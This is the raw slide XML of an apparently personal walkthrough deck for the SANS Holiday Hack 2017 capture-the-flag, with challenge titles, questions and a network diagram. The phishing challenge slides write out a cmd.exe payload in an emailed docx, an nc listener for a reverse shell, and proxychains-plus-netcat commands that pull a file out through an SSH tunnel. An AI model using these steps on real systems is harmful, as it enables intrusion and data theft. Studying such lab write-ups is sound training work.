            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"}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GB" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ttach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to email 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GB" dirty="0"/>
              <a:t>start listener on server you just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>sshed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>tunnelled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 10443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GB" dirty="0"/>
              <a:t>send email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GB" dirty="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CMDreverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>shell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02875" y="536085"/>
            <a:ext cx="5881557" cy="5584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ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>C:\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>find GreatBookPage7.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>listneres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>EMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>server that servers up file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nc-lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 9999 &lt; GreatBookPage7.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>proxychain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> from my host kali through the SSH tunnel to new listener on EMI server to download file locally </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 10.142.0.8 9999 &gt; GreatBookPage7.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Grabbed File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>hasum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>8b887dcc477fdd544ca84b874285283046adb720</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>C1DF4DBC96A58B48A9F235A1CA89352F865AF8B8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>hasums</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>were wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>opened GreatBookPage7.pdf in text editor and sat that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> added in a line, which through off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shasum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>saved and re ran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shasum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>c1df4dbc96a58b48a9f235a1ca89352f865af8b8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="12"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>CORRECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Shasum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981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7 - PHISH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8130" name="Picture 2" descr="map 10.142.0.8 &#10;Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-21 16:02 UTC &#10;Nmap scan report for hhc17-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467" y="1018228"/>
            <a:ext cx="6669277" cy="230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rom: &#10;e To: &#10;Date/Time: Tue, 19 Dec 2017 +0000 &#10;= Subject: gingerbr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81" y="3574280"/>
            <a:ext cx="7623928" cy="309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06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7 - PHISH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7538"/>
            <a:ext cx="9905999" cy="504701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8132" name="Picture 4" descr="ingerbreadcookierecipe &#10;Mailings &#10;Review View &#10;Search in Document &#10;Home &#10;Paste &#10;To keep up-to-date wi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57" y="2123231"/>
            <a:ext cx="9021452" cy="3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7 - PHISH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49154" name="Picture 2" descr="S#•gtL•069L &#10;لاللالاH0 &#10;ال '00 UMO4S2U4S!J uqaelodquou@u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0" y="1649691"/>
            <a:ext cx="5596891" cy="43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labaster_snowball@hhc17-apache-struts2:/tmp/asnow.19xh9tNdIXLegaXqA8HkmcQw$ nc -Ivp 10443 &#10;liste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31" y="1478570"/>
            <a:ext cx="6418852" cy="99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 descr="i recto ry &#10;of C: \ &#10;12/04/2017 &#10;08 &#10;42 pm &#10;11/14/2017 &#10;07 &#10;: 57 pm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25" y="2799760"/>
            <a:ext cx="6293509" cy="321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7 - phish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87194"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50178" name="Picture 2" descr="reatBookPage7.pdf (1 page) v &#10;Ncgaröilt, ffjc &#10;Q Search &#10;f all Ibe var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1" y="1272618"/>
            <a:ext cx="3356238" cy="507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 descr="reatBookPage7.pdf &#10;N/Desktop/Sans HHC2017/GreatBookPage7.pdf . &#10;C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12" y="1272618"/>
            <a:ext cx="8243033" cy="247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6" name="Picture 10" descr="ohnnys—MacBook—Pro:Sans HHC2Ø17 jmedina$ &#10;cidf4dbc96a58b48a9f235a1ca89352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066" y="4760104"/>
            <a:ext cx="7964723" cy="82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8 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>edb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38335"/>
            <a:ext cx="9905999" cy="465286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8) Fetch the letter to Santa from the North Pole Elf Database at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://edb.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Who wrote the letter?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hints on solving this challenge, please locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wunorse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Openslae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>North Pole and Beyond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Worth 0 points, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>didnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> exploit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538" y="0"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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0" y="1090416"/>
            <a:ext cx="8121458" cy="5541329"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18564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9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> true villain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10326"/>
            <a:ext cx="9905999" cy="5547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9) Which character is ultimately the villain causing the giant snowball problem. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What is the villain's motive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Gilda the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Witch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>War between Munchkins and Elves, Sell magic weapons to both sides</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To answer this question, you need to fetch at least five of the seven pages of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and complete the final level of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>North Pole and Beyond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9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> true villain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20" y="252573"/>
            <a:ext cx="7365943" cy="61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557834" y="1172133"/>
            <a:ext cx="2536577" cy="51859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DMZ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 smtClean="0"/>
              <a:t>End network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98903" y="836266"/>
            <a:ext cx="4080227" cy="55478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1" y="2856108"/>
            <a:ext cx="2247221" cy="1767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663" y="899523"/>
            <a:ext cx="829179" cy="829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6181" y="987467"/>
            <a:ext cx="25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Internal Elf Network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6605" y="4623241"/>
            <a:ext cx="170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Elf Attacker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01819" y="5215686"/>
            <a:ext cx="1038253" cy="8115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EWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MAIL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57938" y="1887957"/>
            <a:ext cx="1038253" cy="8115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SMB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29085" y="4233715"/>
            <a:ext cx="1989056" cy="15177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Letters to Santa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH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29085" y="2097285"/>
            <a:ext cx="1989056" cy="15177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Dev.NorthPole.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2591697" y="4237583"/>
            <a:ext cx="1237388" cy="754990"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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888749" y="3512584"/>
            <a:ext cx="1593464" cy="1508259"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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557938" y="3106817"/>
            <a:ext cx="1038253" cy="8115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EDB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24" title="HTTPS"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2661999" y="3398871"/>
            <a:ext cx="1056369" cy="681605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9082257" y="3833479"/>
            <a:ext cx="1875130" cy="23747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Elf ICS Network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527923" y="5126369"/>
            <a:ext cx="1038253" cy="8115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EMI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888749" y="4703976"/>
            <a:ext cx="1596167" cy="584428"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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888749" y="2293722"/>
            <a:ext cx="1613070" cy="2328940"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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 title="HTTPS"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8596191" y="5382706"/>
            <a:ext cx="848373" cy="18853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 title="HTTPS"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2683214" y="2934374"/>
            <a:ext cx="1010245" cy="612472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 title="HTTPS"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8510834" y="5751430"/>
            <a:ext cx="828501" cy="20943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575663" y="4181643"/>
            <a:ext cx="1038253" cy="8115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EAAS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88749" y="5621451"/>
            <a:ext cx="1565171" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1206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0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65" y="166254"/>
            <a:ext cx="7296345" cy="6538987"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2043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3407</TotalTime>
  <Words>1899</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>440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Calibri</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>Sans holiday hack 2017</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Toolbox</vt:lpstr>
      <vt:lpstr>Scope</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Start</vt:lpstr>
      <vt:lpstr>Stocking</vt:lpstr>
      <vt:lpstr>Things to Unlock and Collect</vt:lpstr>
      <vt:lpstr>Terminal-Bushy  Evergreen - FInd</vt:lpstr>
      <vt:lpstr>Terminal-Bushy  Evergreen-Find</vt:lpstr>
      <vt:lpstr>Terminal-Bushy  Evergreen – FInd-SOLVED</vt:lpstr>
      <vt:lpstr>Terminal -Winconceiveaable: the cliffs of winsanity  </vt:lpstr>
      <vt:lpstr>Terminal -Winconceiveaable: the cliffs of winsanity</vt:lpstr>
      <vt:lpstr>Terminal-Candycanestriper</vt:lpstr>
      <vt:lpstr>Terminal-Candycanestriper</vt:lpstr>
      <vt:lpstr>Terminal-Candycanestriper</vt:lpstr>
      <vt:lpstr>Terminal- Theres snow place like home</vt:lpstr>
      <vt:lpstr>Terminal- Theres snow place like home</vt:lpstr>
      <vt:lpstr>Terminal- Theres snow place like home</vt:lpstr>
      <vt:lpstr>Terminal- Bumbles Bounce </vt:lpstr>
      <vt:lpstr>Terminal- Bumbles Bounce </vt:lpstr>
      <vt:lpstr>Terminal- Bumbles Bounce </vt:lpstr>
      <vt:lpstr>Terminal- SugarPlum Mary - i dont think were in kansas anymore </vt:lpstr>
      <vt:lpstr>Terminal- SugarPlum Mary - i dont think were in kansas anymore </vt:lpstr>
      <vt:lpstr>Terminal- shinny Upatree - O wait maybe we are </vt:lpstr>
      <vt:lpstr>Terminal- shinny Upatree - O wait maybe we are </vt:lpstr>
      <vt:lpstr>Terminal- shinny Upatree - O wait maybe we are</vt:lpstr>
      <vt:lpstr>Terminal- shinny Upatree - O wait maybe we are </vt:lpstr>
      <vt:lpstr>Terminal-OpenSlae</vt:lpstr>
      <vt:lpstr>Terminal-OpenSlae</vt:lpstr>
      <vt:lpstr>Terminal-OpenSlae</vt:lpstr>
      <vt:lpstr>Terminal-OpenSlae</vt:lpstr>
      <vt:lpstr>Terminal-OpenSlae</vt:lpstr>
      <vt:lpstr>Things to Unlock and Collect</vt:lpstr>
      <vt:lpstr>Snowball Challenge</vt:lpstr>
      <vt:lpstr>Snowball Challenges</vt:lpstr>
      <vt:lpstr>Snowball CHallenge</vt:lpstr>
      <vt:lpstr>Snowball Challenge</vt:lpstr>
      <vt:lpstr>Snowball Challenge</vt:lpstr>
      <vt:lpstr>Snowball Challenge</vt:lpstr>
      <vt:lpstr>Things to Unlock and Collect</vt:lpstr>
      <vt:lpstr>Challenge 1</vt:lpstr>
      <vt:lpstr>Challenge 2- apache STRuts</vt:lpstr>
      <vt:lpstr>Challenge 2 - apache STRuts</vt:lpstr>
      <vt:lpstr>Challenge 2- apache STRuts</vt:lpstr>
      <vt:lpstr>Challenge 2 - apache STRuts</vt:lpstr>
      <vt:lpstr>Challenge 2 –apache STRuts</vt:lpstr>
      <vt:lpstr>Challenge 3 - SMB</vt:lpstr>
      <vt:lpstr>Challenge 3 - SMB</vt:lpstr>
      <vt:lpstr>Challenge 3 - SMB</vt:lpstr>
      <vt:lpstr>Challenge 3 - SMB</vt:lpstr>
      <vt:lpstr>Challenge 3 - SMB</vt:lpstr>
      <vt:lpstr>Challenge 4-MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 4-MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 4 -MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 4-MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 4-MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 4-MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 4-MAIl cookie</vt:lpstr>
      <vt:lpstr>Challenge 5 - JSON</vt:lpstr>
      <vt:lpstr>Challenge 5 - JSON</vt:lpstr>
      <vt:lpstr>Challenge 5 - JSON</vt:lpstr>
      <vt:lpstr>Challenge 5-JSON</vt:lpstr>
      <vt:lpstr>Challenge 5 - JSOn</vt:lpstr>
      <vt:lpstr>Challenge 5-JSON</vt:lpstr>
      <vt:lpstr>Challenge 6 -XXE</vt:lpstr>
      <vt:lpstr>Challenge 6 - XXE</vt:lpstr>
      <vt:lpstr>Challenge 6 - XXE</vt:lpstr>
      <vt:lpstr>Challenge 6 - XXE</vt:lpstr>
      <vt:lpstr>Challenge 7 - PHISH</vt:lpstr>
      <vt:lpstr>Challenge 7 - PHISH</vt:lpstr>
      <vt:lpstr>Challenge 7 - PHISH</vt:lpstr>
      <vt:lpstr>Challenge 7 - PHISH</vt:lpstr>
      <vt:lpstr>Challenge 7 - PHISH</vt:lpstr>
      <vt:lpstr>Challenge 7 - phish</vt:lpstr>
      <vt:lpstr>Challenge 8 - edb</vt:lpstr>
      <vt:lpstr>Challenge 8</vt:lpstr>
      <vt:lpstr>Challenge 9 – true villain</vt:lpstr>
      <vt:lpstr>Challenge 9 – true villain</vt:lpstr>
      <vt:lpstr>End network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Sans holiday hack 2018</dc:title>
  <dc:creator>Johnny Medina</dc:creator>
  <cp:lastModifiedBy>Johnny Medina</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-12T01:25:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-28T13:51:04Z</dcterms:modified>
</cp:coreProperties>
</file>